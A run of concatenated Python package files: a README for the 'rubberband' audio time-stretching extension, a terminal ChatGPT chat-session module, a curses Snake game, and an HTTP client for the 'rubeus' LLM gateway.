**rubberband** is a simple Python3 wrapper around the well-known librubberband_ sound stretching / pitch-shifting library. Unlike existing Python wrappers (e.g. pyrubberband_) this is a true native extension.
The initial release provides a single function that will stretch a mono audio stream by multiplying its duration by a provided factor. Future versions may include pitch shifting, and more complex processing based on data maps.
Installation
------------
The module is available only for macOS and Linux. The code may compile on Windows, but it has not been tested. Dependencies are:
- Python 3 (preferably 3.6 or greater)
- librubberband_ (> 1.8)
- libsndfile_ (> 1.0)
Assuming these dependencies are met, then installation is simplicity itself::
pip3 install rubberband
The install script does check for the required libraries, and will complain vociferously if they cannot be located. Information on obtaining them is available from the links above.
API
---
Audio stream formatting
~~~~~~~~~~~~~~~~~~~~~~~
The module exposes a single function **rubberband.stretch** which applies the librubberband_ algorithm to a mono audio stream, encoded in one of the following formats, each of which has a corresponding constant, as set out in the third column:
.. table::
======= =========================== ================
Format Description Constant
======= =========================== ================
PCM_U8 unsigned 8-bit rubberband.uint8
PCM_S8 signed 8-bit rubberband.int8
PCM_16 signed 16-bit rubberband.int16
PCM_32 signed 32-bit rubberband.int32
FLOAT *normalised* 32-bit float rubberband.float32
======= =========================== ================
Note that floating point data is assumed to be normalised, so all samples lie in the range [-1,1).
Audio data can be passed to **rubberband.stretch** in any of three ways:
**Typed array**
A 1-dimensional NUMPY_ typed **array** object, whose **dtype** is one of ``numpy.uint8``,
``numpy.int8``, ``numpy.int16``, ``numpy.int32`` or ``numpy.float32``. The type of the audio
data is deduced from this, using the strangely convenient fact that if **T** is one of ``uint8``,
``int8``, ``int16``, ``int32``, ``float32`` then
.. code:: python
numpy.dtype(numpy.T).num == rubberband.T
**List**
A simple Python **list**, all of whose elements are of a type implicitly convertible to **float**.
In this case, the audio format cannot be deduced, so it must be specified using the *format* argument
to **rubberband.stretch** (see below).
**Raw bytestream**
A Python **bytes** object, whose content is the raw PCM byte stream (note: audio file metadata,
e.g. WAV file headers, must be stripped, so only PCM data remains). Again, in this case, the audio
format cannot be deduced, so it must be specified using the *format* argument
to **rubberband.stretch** (see below).
In all cases, the output from **rubberband.stretch** has the same PCM format, and is stored in the same
kind of object, as the input. So, for example, given a **bytes** object representing a **PCM_16**
audio channel, **rubberband.stretch** returns **bytes** object representing a **PCM_16**
stretched audio channel.
Method signature
~~~~~~~~~~~~~~~~
**rubberband.stretch** (*input*, *format* = **rubberband.float32**, *rate* = **48000** , *ratio* = **1** , *crispness* = **5** , *formants* = **False**, *precise* = **True** )
Arguments
*input*
The input is assumed to represent a single channel of PCM audio data, encoded with one
of the schemes listed above. It can be any of the types set out above.
*format*
The PCM format of the data, specified using one of the constants set out above. This
value is *ignored* if *input* is a NUMPY typed array, in which case the format is deduced
from its **dtype**.
*rate*
The frame rate of the input audio stream (so bit rate divided by sample size).
*ratio*
The ratio of output duration to input duration (equivalently, the ratio of output sample count to input sample count).
*crispness*
Integer 0 - 6, default 5: measure of performance - see the `rubberband-cli documentation`_
for more details.
*formants*
Boolean, default **False** : whether or not to preserve formants - see the
`rubberband-cli documentation`_ for more details.
*precise*
Boolean, default **True** : whether or not to use the precise stretching algorithm -
see the `rubberband-cli documentation`_ for more details.
Return value
An object containing the stretched audio data, represented using the same PCM encoding as the
*input*. Samples are normalised to lie in the expected range for the format.
Example
-------
.. code:: python
import rubberband
import soundfile
data,rate=soundfile.read('infile.wav',dtype='int16')
bitrate=rate*16
nFrames=len(data)
print(f'Raw input type is : {type(data)}')
oldDuration=nFrames/rate
newDuration=6
ratio=newDuration/oldDuration
out=rubberband.stretch(data,rate=rate,ratio=ratio,crispness=5,formants=False,precise=True)
soundfile.write('outfile.wav',out,rate,'PCM_16')
.. _librubberband: https://breakfastquay.com/rubberband/
.. _pyrubberband: https://pypi.org/project/pyrubberband/
.. _libsndfile: http://www.mega-nerd.com/libsndfile/
.. _`rubberband-cli documentation`: https://breakfastquay.com/rubberband/usage.txt
.. _NUMPY: https://numpy.org
| /rubberband-1.0.2.tar.gz/rubberband-1.0.2/README.rst | 0.882573 | 0.731838 | README.rst | pypi |
import re
import inquirer
import openai
import pyperclip
from halo import Halo
from rich.console import Console
from rich.syntax import Syntax
from rubberduck_chat.chat_gpt.session_store import *
from rubberduck_chat.utils import get_datetime
from dataclasses import dataclass
@dataclass
class GptChatSessionConfigs:
    """User-tunable settings shared by every chat session."""

    # Model identifier passed to the OpenAI chat-completion endpoint.
    chat_gpt_model: str
    # How many past turns are replayed as request context.
    max_messages_per_request: int
    # Background colour of the header line above rendered code snippets.
    snippet_header_background_color: str
    # Syntax-highlighting theme used by rich when rendering snippets.
    snippet_theme: str
class GptChatSession:
    """One persisted conversation with the chat model.

    Holds the ordered list of turns, renders assistant replies (including
    syntax-highlighted fenced code snippets), and appends every turn to the
    session's on-disk log via the session_store helpers.
    """

    # Matches a closing ``` fence (also matches an opening one; see the
    # ordering note in print_assistant_response).
    snippet_end_pattern = r'\s*```'
    # Matches an opening ``` fence, optionally capturing a language tag.
    snippet_start_pattern = r'\s*```(\S+)?'
    # Matches `inline code` spans so they can be rendered in bold.
    quote_pattern = re.compile(r'`([^`]*)`')

    def __init__(self, session_id, configs: GptChatSessionConfigs, session_metadata: GptSessionMetadata,
                 system_message: GptSystemMessage,
                 turns: List[GptChatTurn]):
        self.session_id: str = session_id
        self.configs: GptChatSessionConfigs = configs
        self.session_metadata: GptSessionMetadata = session_metadata
        self.system_message: GptSystemMessage = system_message
        self.turns: List[GptChatTurn] = turns
        self.console: Console = Console()
        # Snippets extracted from the most recent assistant reply, kept so the
        # user can copy one by its 1-based number.
        self.snippets: List[str] = []

    @classmethod
    def create_new(cls, configs: GptChatSessionConfigs):
        """Start an empty session with a fresh id and a default system prompt."""
        message = GptSystemMessage.from_system_message('You are a helpful assistant')
        session_id = str(uuid4())
        return cls(session_id, configs, GptSessionMetadata(session_id, int(time.time())), message, [])

    @classmethod
    def from_session_id(cls, session_id: str, configs: GptChatSessionConfigs):
        """Rebuild a session from its log file.

        Line 0 is the session metadata and line 1 the system message; the
        remaining lines are turns.  Turns are scanned newest-to-oldest so
        that, for any turn id written more than once (a turn is stored both
        before and after its response), only the latest copy is kept; the
        chronological order is then restored.
        """
        lines: List[str] = fetch_session_data(session_id)
        gpt_session_metadata: GptSessionMetadata = GptSessionMetadata.from_line(lines[0])
        gpt_system_message: GptSystemMessage = GptSystemMessage.from_json_string(lines[1])
        gpt_chat_turns: List[GptChatTurn] = []
        turn_ids: set[str] = set()
        # lines[-1:1:-1] walks backwards from the last line down to index 2,
        # skipping the metadata and system-message lines.
        for line in lines[-1:1:-1]:
            turn = GptChatTurn.from_json_string(line)
            if turn.id in turn_ids:
                continue
            turn_ids.add(turn.id)
            gpt_chat_turns.append(turn)
        gpt_chat_turns.reverse()
        return cls(session_id, configs, gpt_session_metadata, gpt_system_message, gpt_chat_turns)

    def print_current_session(self, print_time=False):
        """Replay the whole conversation to stdout, optionally with timestamps."""
        for turn in self.turns:
            if print_time:
                create_time = f'[{get_datetime(turn.created_time)}] '
            else:
                create_time = ''
            print(f'>>>{create_time}{turn.user_prompt}')
            assistant_response = turn.get_assistant_response()
            if assistant_response:
                self.print_assistant_response(assistant_response)

    def process_prompt(self, prompt: str, configs: GptChatSessionConfigs):
        """Send ``prompt`` plus recent history to the model and render the reply.

        The turn is persisted before the request is made and again once the
        response arrives, so a crash mid-request still leaves the prompt on disk.
        """
        current_turn = GptChatTurn.from_user_prompt(prompt)
        self.store_chat_turn(current_turn)
        self.turns.append(current_turn)
        messages: List[dict] = [self.system_message.get_chat_gpt_request_message()]
        # Replay only the most recent turns (history budget + the new turn).
        for turn in self.turns[-(self.configs.max_messages_per_request + 1):]:
            messages.append(turn.get_user_prompt_message())
            assistant_response_message = turn.get_assistant_response_message()
            if assistant_response_message:
                messages.append(assistant_response_message)
        response = None
        error_message = None
        # Show a spinner while the (blocking) API call is in flight.
        with Halo(text='Fetching', spinner='dots'):
            try:
                response = openai.ChatCompletion.create(model=configs.chat_gpt_model, messages=messages)
            except Exception as error:
                error_message = str(error)
        if error_message:
            print(error_message)
            return
        if response:
            current_turn.updated_response(response)
            self.store_chat_turn(current_turn)
            self.print_assistant_response(current_turn.get_assistant_response())
        else:
            print('No results found')

    def print_assistant_response(self, message: str):
        """Render an assistant reply, with fenced code blocks syntax-coloured.

        A small line-by-line state machine: outside a fence, lines print as
        text; an opening ``` switches to snippet collection; the closing ```
        prints the collected snippet and records it for copy-by-number.
        """
        new_snippets: List[str] = []
        message_parts = message.split('\n')
        snippet = None  # None = not inside a fence; str = snippet text so far
        snippet_language = None
        snippet_count = 0
        for part in message_parts:
            # The end pattern also matches an opening fence, so only treat it
            # as a close when a snippet is currently being collected.
            if re.search(self.snippet_end_pattern, part) and snippet is not None:
                self.print_header(snippet_language, snippet_count)
                self.print_code(snippet_language, snippet)
                new_snippets.append(snippet)
                snippet = None
                snippet_language = None
            elif re.search(self.snippet_start_pattern, part):
                matches = re.findall(self.snippet_start_pattern, part)
                if matches:
                    snippet_language = matches[0]
                else:
                    snippet_language = None
                snippet = ''
                snippet_count += 1
            elif snippet is not None:
                snippet += part + '\n'
            elif not part:
                print()
            else:
                self.print_text(part)
        # Only replace the stored snippets when this reply contained some, so
        # snippets from the previous reply stay copyable otherwise.
        if new_snippets:
            self.snippets = new_snippets
        print('')

    def print_header(self, language: str, count: int):
        """Print the coloured header line shown above a code snippet."""
        copy_message = f'Enter "{count}" to copy snippet'
        if language:
            header = f' {language.upper()} | {copy_message}'
        else:
            header = f' {copy_message}'
        syntax = Syntax(header, 'text', theme=self.configs.snippet_theme,
                        background_color=self.configs.snippet_header_background_color)
        self.console.print(syntax, overflow='fold')

    def print_code(self, language: str, code: str):
        """Print ``code`` with syntax highlighting (plain text if no language)."""
        if not language:
            language = 'text'
        syntax = Syntax(code, language, theme=self.configs.snippet_theme)
        self.console.print(syntax, overflow='fold')

    def print_text(self, text: str):
        """Print a prose line, rendering `inline code` spans in bold."""
        highlighted_text = self.quote_pattern.sub(r'`\033[1m\1\033[0m`', text)
        print(highlighted_text)

    def has_snippet(self, snippet_index: int) -> bool:
        """Return True if the 1-based ``snippet_index`` is within range.

        NOTE(review): indices <= 0 also pass this check — confirm callers
        only pass positive numbers.
        """
        return snippet_index <= len(self.snippets)

    def copy_snippet(self, snippet_index: int):
        """Copy the 1-based ``snippet_index``-th snippet to the clipboard."""
        if snippet_index <= len(self.snippets):
            pyperclip.copy(self.snippets[snippet_index - 1])
            print('Snippet copied to clipboard')
        else:
            print('No snippet to copy')

    def store_chat_turn(self, gpt_chat_turn: GptChatTurn):
        """Append a turn to the session log, writing the file header first.

        ``self.turns`` is still empty when the very first turn is stored
        (process_prompt stores before appending), which is what triggers
        writing the metadata and system-message header lines.
        """
        if self.turns:
            store_chat_turn_to_file(self.session_id, gpt_chat_turn)
        else:
            store_metadata_to_file(self.session_id, self.session_metadata)
            store_system_message_to_file(self.session_id, self.system_message)
            store_chat_turn_to_file(self.session_id, gpt_chat_turn)
class GptChat:
    """Facade over a single active ``GptChatSession`` plus session switching."""

    def __init__(self, session: GptChatSession, configs: GptChatSessionConfigs):
        self.session = session
        self.configs = configs

    def process_prompt(self, prompt: str):
        """Forward a user prompt to the active session."""
        self.session.process_prompt(prompt, self.configs)

    def create_new_session(self):
        """Start a fresh session and mark it as the active one."""
        self.session = GptChatSession.create_new(self.configs)
        set_active_session_id(self.session.session_id)
        print('Started new session')

    def update_configs(self, configs: GptChatSessionConfigs):
        """Swap in new configs for both this wrapper and the session."""
        self.configs = configs
        self.session.configs = configs

    def has_snippet(self, snippet_index: int) -> bool:
        return self.session.has_snippet(snippet_index)

    def copy_snippet(self, snippet_index: int):
        self.session.copy_snippet(snippet_index)

    def print_current_session(self):
        self.session.print_current_session(print_time=True)

    def change_session(self):
        """Let the user pick a stored session interactively and load it."""
        session_previews = get_all_session_previews()
        if not session_previews:
            print('No previous session found')
            return
        message = f'Select from {len(session_previews)} sessions'
        choices = [(item.session_preview, item) for item in session_previews]
        questions = [inquirer.List('option', message=message, choices=choices)]
        answers = inquirer.prompt(questions)
        if not answers:
            return
        preview: GptSessionPreview = answers['option']
        self.session = GptChatSession.from_session_id(preview.session_id, self.configs)
        self.session.print_current_session(print_time=True)
        set_active_session_id(preview.session_id)
        print(f'Loaded session: {preview.session_preview}')
import curses
import numpy as np
import game_utilities as gu
class Snake:
    """The player-controlled snake: an ordered (row, col) cell array plus a heading."""

    def __init__(self, game, initial_length):
        # Start as a vertical run of cells around the centre of the play field.
        rows = np.arange(initial_length) + (game.size[0] // 2)
        cols = np.full(initial_length, game.size[1] // 2, dtype="int64")
        self.cells = np.stack([rows, cols], axis=1)
        self.direction = np.array([-1, 0])

    @property
    def length(self):
        return self.cells.shape[0]

    def intersected_itself(self):
        # A duplicate row means the head has entered an occupied cell.
        return len(np.unique(self.cells, axis=0)) != len(self.cells)
class Game:
    """The snake game proper: per-tick update, input handling and drawing."""

    # Hard cap on the play-field size, regardless of terminal size.
    _max_size = np.array([24, 80])

    def __init__(self, stdscr):
        self.stdscr = stdscr

    @property
    def size(self):
        """Play-field size: terminal size minus UI chrome, capped at _max_size."""
        return np.amin(np.stack([
            gu.window_size(self.stdscr) - [3, 2],  # Subtracting rows/columns required by the score/hint text and borders
            Game._max_size,
        ]), axis=0)

    def show(self, settings):
        """Run the game loop until the player quits or dies; return the final score."""
        snake = Snake(self, 1)
        pellet = np.random.randint(self.size, size=2)
        key = None
        # getch return value of 27 corresponds to escape key - doesn't look like curses has a constant for this
        # 3rd condition checks if snake has "eaten" (intersected with) itself, i.e. whether any cells re-appear in the list
        while key != 27 and key != ord("q") and not snake.intersected_itself():
            # Set the maximum amount of time to block for a key press
            # This is effectively the update interval (speeds up as the snake grows)
            self.stdscr.timeout(max(20, 250 // (snake.length // 5 + 1)))
            key = self.stdscr.getch()  # TODO: Do this last to prevent waiting before drawing game screen

            # Update
            (game_over, pellet) = self.update(key, snake, pellet, settings)
            if game_over:
                break

            # Draw
            self.draw(snake, pellet)

        # For user input, remove the timeout but keep blocking enabled
        self.stdscr.nodelay(False)

        # Return score
        return snake.length

    def update(self, key, snake, pellet, settings):
        """Advance the game one tick; return ``(game_over, pellet)``."""
        # Set new direction based on the key input
        # If an arrow key wasn't pressed then continue in same direction
        if key == curses.KEY_LEFT:
            new_direction = gu.LEFT
        elif key == curses.KEY_RIGHT:
            new_direction = gu.RIGHT
        elif key == curses.KEY_UP:
            new_direction = gu.UP
        elif key == curses.KEY_DOWN:
            new_direction = gu.DOWN
        else:
            new_direction = snake.direction

        # Prevent the snake reversing on itself, i.e. check that the snake's current and new directions aren't the reverse
        # of one another
        if not np.array_equal(snake.direction, -new_direction):
            snake.direction = new_direction

        # Add a cell to the front of the snake, in the given direction
        current_front = snake.cells[0]
        new_front = current_front + snake.direction
        # Without wrapping, leaving the play field ends the game.
        if not settings["snake_wrapping"].value\
                and not (np.all(new_front >= gu.ZERO) and np.all(new_front < self.size)):
            return True, pellet
        new_front = new_front % self.size
        snake.cells = np.insert(snake.cells, 0, new_front, axis=0)

        # If the snake just "ate" (intersected with) a pellet:
        # * Effectively increase the length by 1, by not removing a cell to compensate for the one just added
        # * Move the pellet to a random position
        # If the snake didn't just "eat" a pellet:
        # * Remove a cell to compensate for the one just added, so length of the snake stays the same
        # * Obviously leave the pellet where it is
        if (snake.cells == pellet).all(axis=1).any():
            # NOTE(review): the new pellet may spawn on the snake itself — confirm acceptable
            pellet = np.random.randint(self.size, size=2)
        else:
            snake.cells = np.delete(snake.cells, -1, axis=0)

        return False, pellet

    def draw_borders(self, base_position):
        """Draw the box border around the play field."""
        # Draw lines
        self.stdscr.vline(base_position[0], base_position[1] - 1, curses.ACS_VLINE, self.size[0])
        self.stdscr.vline(base_position[0], base_position[1] + self.size[1], curses.ACS_VLINE, self.size[0])
        self.stdscr.hline(base_position[0] - 1, base_position[1], curses.ACS_HLINE, self.size[1])
        self.stdscr.hline(base_position[0] + self.size[0], base_position[1], curses.ACS_HLINE, self.size[1])

        # Draw corners
        self.stdscr.addch(base_position[0] - 1, base_position[1] - 1, curses.ACS_ULCORNER)
        self.stdscr.addch(base_position[0] - 1, base_position[1] + self.size[1], curses.ACS_URCORNER)
        self.stdscr.addch(base_position[0] + self.size[0], base_position[1] - 1, curses.ACS_LLCORNER)
        try:
            self.stdscr.addch(base_position[0] + self.size[0], base_position[1] + self.size[1], curses.ACS_LRCORNER)
        except curses.error as e:  # Ignore error when writing to bottom-right corner of window
            pass

    def draw(self, snake, pellet):
        """Redraw the whole screen: score, hint, borders, pellet and snake."""
        self.stdscr.clear()

        # Display score
        self.stdscr.addstr(0, 0, f"Score: {snake.length}")

        # Display hint (only while the snake is still short, i.e. early game)
        if snake.length <= 3:
            self.stdscr.attron(curses.A_STANDOUT)
            message = "Hint: To move faster, repeatedly press or hold the arrow key."
            self.stdscr.addstr(0, gu.window_max(self.stdscr)[1] - len(message) + 1, message)
            self.stdscr.attroff(curses.A_STANDOUT)

        base_position = gu.align(self.stdscr, self.size, gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.TOP) + [2, 0]

        # Draw borders
        self.draw_borders(base_position)

        # Draw pellet
        if curses.has_colors():
            self.stdscr.attron(curses.color_pair(2))
        try:
            self.stdscr.addch(base_position[0] + pellet[0], base_position[1] + pellet[1], "o")
        except curses.error as e:  # Ignore error when writing to bottom-right corner of window
            pass
        if curses.has_colors():
            self.stdscr.attroff(curses.color_pair(2))

        # Draw snake
        for cell in snake.cells:
            if curses.has_colors():
                self.stdscr.attron(curses.color_pair(1))
            try:
                self.stdscr.addch(base_position[0] + cell[0], base_position[1] + cell[1], "x")
            except curses.error as e:  # Ignore error when writing to bottom-right corner of window
                pass
            if curses.has_colors():
                self.stdscr.attroff(curses.color_pair(1))
class Setting:
    """A single user-togglable option shown on the settings screen."""

    def __init__(self, name, key, value):
        self.name = name    # Human-readable description shown in the menu
        self.key = key      # Keyboard key that toggles this setting
        self.value = value  # Current value (boolean for the existing settings)
def curses_main(stdscr):
    """Top-level curses program: title screen, game loop, then game-over screen."""
    # Initialise colours (pair 1: snake, pair 2: pellet)
    curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
    curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_BLACK)

    # Show cursor on the menu screens
    curses.curs_set(1)
    settings = {
        "snake_wrapping": Setting(name="Snake wraps around screen edge", key="b", value=True),
    }
    show_title_screen(stdscr, settings)

    # Hide cursor while the game is running
    curses.curs_set(0)
    game = Game(stdscr)
    score = game.show(settings)

    # Show cursor again for the game-over screen
    curses.curs_set(1)
    show_game_over_screen(stdscr, score)
# TODO: Add animation
def show_title_screen(stdscr, settings):
    """Show the title/menu screen until the player chooses to start.

    'C' opens the controls screen and 'S' the settings screen; any other
    key starts the game.
    """
    finished = False
    while not finished:
        stdscr.clear()
        gu.addstr_multiline_aligned(stdscr, [
            " ____ _ \n"
            "/ ___| _ __ __ _| | _____ \n"
            "\\___ \\| '_ \\ / _` | |/ / _ \\\n"
            " ___) | | | | (_| | < __/\n"
            "|____/|_| |_|\\__,_|_|\\_\\___|",
            "",
            "Ruben Dougall",
            "",
            "Press C to view controls...",
            "Press S to change settings...",
            "Press any key to start..."
        ], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
        key = stdscr.getch()
        if key == ord("c"):
            show_controls_screen(stdscr)
        elif key == ord("s"):
            show_settings_screen(stdscr, settings)
        else:
            finished = True
def show_controls_screen(stdscr):
    """Show the in-game controls until any key is pressed."""
    stdscr.clear()
    gu.addstr_multiline_aligned(stdscr, [
        "In-Game Controls",
        "",
        "← ↑ → ↓ - Change direction (hold to move faster)",
        "Q - End game",
        "",
        "Press any key to close this screen..."
    ], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
    stdscr.getch()
def show_settings_screen(stdscr, settings):
    """Show the settings screen; pressing a setting's key toggles that setting.

    Any key that does not match a setting closes the screen.
    """
    finished = False
    while not finished:
        stdscr.clear()
        gu.addstr_multiline_aligned(stdscr, [
            "Settings",
            ""
        ] + [f"{setting.key.upper()} - {setting.name} ({setting.value})" for setting in settings.values()] + [
            "",
            "Press any key to close this screen..."
        ], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
        key = stdscr.getch()
        # Find the setting whose toggle key was pressed, if any.
        setting = next((setting for setting in settings.values() if key == ord(setting.key)), None)
        if setting is None:
            finished = True
        else:
            setting.value = not setting.value
def show_game_over_screen(stdscr, score):
    """Show the final score until any key is pressed."""
    stdscr.clear()
    gu.addstr_multiline_aligned(stdscr, [
        "Game over!",
        f"Score: {score}",
        "",
        "Press any key to exit..."
    ], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
    stdscr.getch()
def main():
    """Console entry point: run the game inside ``curses.wrapper`` so the
    terminal is restored even if the program raises."""
    # Fix: stray non-Python residue (a concatenation artifact) was fused onto
    # the final line, making the module unparsable; it has been removed.
    curses.wrapper(curses_main)


if __name__ == "__main__":
    main()
from __future__ import annotations
import json
from types import TracebackType
from typing import (
Dict,
Any,
Union,
Mapping,
cast,
List,
Optional,
Type,
overload,
Literal,
)
import httpx
import platform
from .global_constants import DEFAULT_MAX_RETRIES, PORTKEY_HEADER_PREFIX
from .utils import (
remove_empty_values,
Body,
Options,
Config,
ProviderOptions,
RubeusResponse,
)
from .exceptions import (
APIStatusError,
APITimeoutError,
APIConnectionError,
)
from rubeus.version import VERSION
from .utils import ResponseT, make_status_error
from .common_types import StreamT
from .streaming import Stream
class MissingStreamClassError(TypeError):
    """Raised when ``stream=True`` is requested without a ``stream_cls``.

    Fix: the original message used a backslash line-continuation *inside* the
    string literal, which baked the next line's indentation (a long run of
    spaces) into the error text; the message is now a single clean sentence
    built from implicitly concatenated literals.
    """

    def __init__(self) -> None:
        super().__init__(
            "The `stream` argument was set to `True` but the `stream_cls` "
            "argument was not given"
        )
class APIClient:
    """Synchronous HTTP client for the Rubeus/Portkey gateway.

    Wraps ``httpx.Client`` and knows how to (a) serialise the provider
    configuration into the request body, (b) attach the gateway's custom
    headers, and (c) map HTTP failures onto this package's exception types.
    """

    _client: httpx.Client
    # Stream wrapper used when a caller requests streaming but supplies no
    # explicit stream class.
    _default_stream_cls: Union[type[Stream[Any]], None] = None

    def __init__(
        self,
        *,
        base_url: str,
        api_key: str,
        timeout: Union[float, None],
        max_retries: int = DEFAULT_MAX_RETRIES,
        custom_headers: Optional[Mapping[str, Any]] = None,
        custom_query: Optional[Mapping[str, object]],
        custom_params: Optional[Dict[str, Any]] = None,
    ) -> None:
        self.api_key = api_key
        self.max_retries = max_retries
        # Custom headers are prefixed and JSON-serialised up front.
        self._custom_headers = self._serialize_header_values(custom_headers)
        self._custom_query = custom_query
        self._custom_params = custom_params
        self._client = httpx.Client(
            base_url=base_url,
            timeout=timeout,
            headers={"Accept": "application/json"},
        )

    def _serialize_header_values(
        self, headers: Optional[Mapping[str, Any]]
    ) -> Dict[str, str]:
        """Prefix every header name and JSON-encode dict/list values."""
        if headers is None:
            return {}
        return {
            f"{PORTKEY_HEADER_PREFIX}{k}": json.dumps(v)
            if isinstance(v, (dict, list))
            else str(v)
            for k, v in headers.items()
        }

    @property
    def custom_auth(self) -> Optional[httpx.Auth]:
        """Hook for subclasses to supply an ``httpx.Auth``; none by default."""
        return None

    @overload
    def post(
        self,
        path: str,
        *,
        body: List[Body],
        mode: str,
        cast_to: Type[ResponseT],
        stream: Literal[True],
        stream_cls: type[StreamT],
    ) -> StreamT:
        ...

    @overload
    def post(
        self,
        path: str,
        *,
        body: List[Body],
        mode: str,
        cast_to: Type[ResponseT],
        stream: Literal[False],
        stream_cls: type[StreamT],
    ) -> ResponseT:
        ...

    @overload
    def post(
        self,
        path: str,
        *,
        body: List[Body],
        mode: str,
        cast_to: Type[ResponseT],
        stream: bool,
        stream_cls: type[StreamT],
    ) -> Union[ResponseT, StreamT]:
        ...

    def post(
        self,
        path: str,
        *,
        body: List[Body],
        mode: str,
        cast_to: Type[ResponseT],
        stream: bool,
        stream_cls: type[StreamT],
    ) -> Union[ResponseT, StreamT]:
        """POST ``body`` to ``path``; return a parsed response or a stream."""
        body = cast(List[Body], body)
        opts = self._construct(method="post", url=path, body=body, mode=mode)
        res = self._request(
            options=opts,
            stream=stream,
            cast_to=cast_to,
            stream_cls=stream_cls,
        )
        return res

    def _construct(
        self, *, method: str, url: str, body: List[Body], mode: str
    ) -> Options:
        """Build the request ``Options``: JSON body, headers, method and URL."""
        opts = Options.construct()
        opts.method = method
        opts.url = url
        json_body = {
            "config": self._config(mode, body).dict(),
            "params": self._custom_params,
        }
        # Drop empty values so the gateway only sees meaningful keys.
        opts.json_body = remove_empty_values(json_body)
        opts.headers = (
            remove_empty_values(self._custom_headers) if self._custom_headers else None
        )
        return opts

    def _config(self, mode: str, body: List[Body]) -> Config:
        """Convert the per-provider ``Body`` items into a gateway ``Config``."""
        config = Config(mode=mode, options=[])
        for i in body:
            item = i.dict()
            override_params = i.override_params()
            options = ProviderOptions(
                provider=item.get("provider"),
                apiKey=item.get("api_key"),
                weight=item.get("weight"),
                retry=item.get("retry"),
                override_params=override_params,
            )
            config.options.append(options)
        return config

    @property
    def _default_headers(self) -> Mapping[str, str]:
        """Headers attached to every request (auth, package/runtime telemetry)."""
        return {
            "Content-Type": "application/json",
            f"{PORTKEY_HEADER_PREFIX}api-key": self.api_key,
            f"{PORTKEY_HEADER_PREFIX}package-version": f"rubeus-{VERSION}",
            f"{PORTKEY_HEADER_PREFIX}runtime": platform.python_implementation(),
            f"{PORTKEY_HEADER_PREFIX}runtime-version": platform.python_version(),
        }

    def _build_headers(self, options: Options) -> httpx.Headers:
        """Merge default headers with the per-request custom headers."""
        custom_headers = options.headers or {}
        headers_dict = self._merge_mappings(self._default_headers, custom_headers)
        headers = httpx.Headers(headers_dict)
        return headers

    def _merge_mappings(
        self,
        obj1: Mapping[str, Any],
        obj2: Mapping[str, Any],
    ) -> Dict[str, Any]:
        """Merge two mappings of the given type

        In cases with duplicate keys the second mapping takes precedence.
        """
        return {**obj1, **obj2}

    def is_closed(self) -> bool:
        """Return True once the underlying HTTPX client has been closed."""
        return self._client.is_closed

    def close(self) -> None:
        """Close the underlying HTTPX client.

        The client will *not* be usable after this.
        """
        self._client.close()

    def __enter__(self) -> "APIClient":
        return self

    def __exit__(
        self,
        exc_type: Optional[Type[BaseException]],
        exc: Optional[BaseException],
        exc_tb: Optional[TracebackType],
    ) -> None:
        self.close()

    def _build_request(self, options: Options) -> httpx.Request:
        """Translate ``Options`` into a concrete ``httpx.Request``."""
        headers = self._build_headers(options)
        params = options.params
        json_body = options.json_body
        request = self._client.build_request(
            method=options.method,
            url=options.url,
            headers=headers,
            params=params,
            json=json_body,
            timeout=options.timeout,
        )
        return request

    @overload
    def _request(
        self,
        *,
        options: Options,
        stream: Literal[False],
        cast_to: Type[ResponseT],
        stream_cls: Union[type[StreamT], None] = None,
    ) -> ResponseT:
        ...

    @overload
    def _request(
        self,
        *,
        options: Options,
        stream: Literal[True],
        cast_to: Type[ResponseT],
        stream_cls: Union[type[StreamT], None] = None,
    ) -> StreamT:
        ...

    @overload
    def _request(
        self,
        *,
        options: Options,
        stream: bool,
        cast_to: Type[ResponseT],
        stream_cls: Union[type[StreamT], None] = None,
    ) -> Union[ResponseT, StreamT]:
        ...

    def _request(
        self,
        *,
        options: Options,
        stream: bool,
        cast_to: Type[ResponseT],
        stream_cls: Union[type[StreamT], None] = None,
    ) -> Union[ResponseT, StreamT]:
        """Send the request; raise mapped errors or return response/stream.

        Raises:
            APIStatusError: for 4xx/5xx responses.
            APITimeoutError: when the request times out.
            APIConnectionError: for any other transport failure.
            MissingStreamClassError: if ``stream=True`` with no stream class.
        """
        request = self._build_request(options)
        try:
            res = self._client.send(request, auth=self.custom_auth, stream=stream)
            res.raise_for_status()
        except httpx.HTTPStatusError as err:  # 4xx and 5xx errors
            # If the response is streamed then we need to explicitly read the response
            # to completion before attempting to access the response text.
            err.response.read()
            raise self._make_status_error_from_response(request, err.response) from None
        except httpx.TimeoutException as err:
            raise APITimeoutError(request=request) from err
        except Exception as err:
            raise APIConnectionError(request=request) from err
        if stream:
            stream_cls = stream_cls or cast(
                "Union[type[StreamT], None]", self._default_stream_cls
            )
            if stream_cls is None:
                raise MissingStreamClassError()
            stream_response = stream_cls(response=res)
            return stream_response
        response = cast(
            ResponseT,
            RubeusResponse.construct(**res.json(), raw_body=res.json()),
        )
        return response

    def _make_status_error_from_response(
        self,
        request: httpx.Request,
        response: httpx.Response,
    ) -> APIStatusError:
        """Build an ``APIStatusError`` from an error response, preferring the
        gateway's ``error.message`` field when the body is JSON."""
        err_text = response.text.strip()
        body = err_text
        try:
            body = json.loads(err_text)["error"]["message"]
            err_msg = f"Error code: {response.status_code} - {body}"
        except Exception:
            err_msg = err_text or f"Error code: {response.status_code}"
        return make_status_error(err_msg, body=body, request=request, response=response)
from typing import Optional, Union, List, Dict, Any, cast, overload, Literal
from rubeus.api_resources.base_client import APIClient
from .global_constants import DEFAULT_MAX_RETRIES, DEFAULT_TIMEOUT
from .utils import (
ProviderTypes,
RubeusCacheType,
LLMBase,
RubeusModes,
Message,
ProviderTypesLiteral,
Body,
RubeusResponse,
RetrySettings,
Function,
)
from .streaming import Stream
__all__ = ["Completions", "ChatCompletions"]
class APIResource:
    """Base class for API resource namespaces; holds the shared ``APIClient``.

    Only ``post`` is bound today; the commented lines are placeholders for
    HTTP verbs the client does not implement yet.
    """

    _client: APIClient

    def __init__(self, client: APIClient) -> None:
        self._client = client
        # self._get = client.get
        self._post = client.post
        # self._patch = client.patch
        # self._put = client.put
        # self._delete = client.delete
        # self._get_api_list = client.get_api_list
